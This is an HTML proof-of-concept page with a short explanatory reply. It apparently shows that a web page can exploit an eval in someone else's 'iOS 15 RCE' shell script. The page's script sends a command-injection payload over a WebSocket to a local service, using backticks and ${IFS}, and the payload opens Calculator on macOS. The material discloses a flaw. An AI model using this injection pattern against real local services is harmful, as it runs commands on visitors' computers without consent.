An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1 https://twitter.com/mattaustin/status/1447787504837398530

rce_for_rce.html

<!doctype html>
<html lang="en" class="h-100">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://getbootstrap.com/docs/5.0/dist/css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">

    <title>RCE for the RCE</title>
	
	<style>
		/*
		 * Globals
		 */

        .bd-placeholder-img {
          font-size: 1.125rem;
          text-anchor: middle;
          -webkit-user-select: none;
          -moz-user-select: none;
          user-select: none;
        }

        @media (min-width: 768px) {
          .bd-placeholder-img-lg {
            font-size: 3.5rem;
          }
        }

		/*
		 * Globals
		 */


		/* Custom default button */
		.btn-secondary,
		.btn-secondary:hover,
		.btn-secondary:focus {
		  color: #333;
		  text-shadow: none; /* Prevent inheritance from `body` */
		}


		/*
		 * Base structure
		 */

		body {
		  text-shadow: 0 .05rem .1rem rgba(0, 0, 0, .5);
		  box-shadow: inset 0 0 5rem rgba(0, 0, 0, .5);
		}

		.cover-container {
		  max-width: 42em;
		}


		/*
		 * Header
		 */

		.nav-masthead .nav-link {
		  padding: .25rem 0;
		  font-weight: 700;
		  color: rgba(255, 255, 255, .5);
		  background-color: transparent;
		  border-bottom: .25rem solid transparent;
		}

		.nav-masthead .nav-link:hover,
		.nav-masthead .nav-link:focus {
		  border-bottom-color: rgba(255, 255, 255, .25);
		}

		.nav-masthead .nav-link + .nav-link {
		  margin-left: 1rem;
		}

		.nav-masthead .active {
		  color: #fff;
		  border-bottom-color: #fff;
		}
	</style>
	
  </head>
  <body class="d-flex h-100 text-center text-white bg-dark">
    
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
  <header class="mb-auto">

  </header>

  <main class="px-3 text-end">
	<h1 style="font-size: 90px; color:#0000;">MA</h1>
    <h1 style="font-size: 80px">Matt Austin</h1>
    <p class="lead" style="color:#d0e4f8; font-size: 1.5em;">RCE for the "RCE" V1.0 PoC iOS 15.0.1 (By Jonathan Scott)</br>
	Developed by <a href="https://twitter.com/mattaustin" class="text-white">Matt Austin</a></p>
    <p class="lead">
      <a href="#" class="btn btn-lg btn-secondary fw-bold border-white bg-white" onclick="send()">► Start</a>
    </p>
  </main>

  <footer class="mt-auto text-white-50">
    <p>© ®2021 Matt Austin by <a href="https://twitter.com/mattaustin" class="text-white">@mattaustin</a>.</p>
  </footer>
</div>

<script>
	let socket = new WebSocket("ws://127.0.0.1:8081/");

	socket.onopen = function(e) {
	  console.log("[open] Connection established");
	  console.log("Sending to server");
	};

	socket.onmessage = function(event) {
	  console.log(`[message] Data received from server: ${event.data}`);
	};

	socket.onclose = function(event) {
	  console.log('[close] Connection died');
	};

	socket.onerror = function(error) {
	  console.log(`[error] ${error.message}`);
	};
	function send(){
		socket.send("`open${IFS}-a${IFS}Calculator;`");
	}
</script>   
  </body>
</html>

@Hackdwerg Why not?

If you are running the fake RCE By Jonathan Scott from: https://github.com/jonathandata1/ios_15_rce
you can see that it calls an eval at: https://github.com/jonathandata1/ios_15_rce/blob/master/wsmanager.sh#L188

If you view this page (https://maustin.net/hax/rce_poc_poc.html) while running his exploit and click the button it makes a websocket call at https://gist.github.com/matt-/c3028fa85d2d4f599351344ea7502865#file-index-html-L130 to exploit the eval and runs open${IFS}-a${IFS}Calculator; open the calculator on macos.

If an attacker can create a website that executes code and makes system calls on your computer simply by viewing it I consider it an RCE. Can you explain why you don't?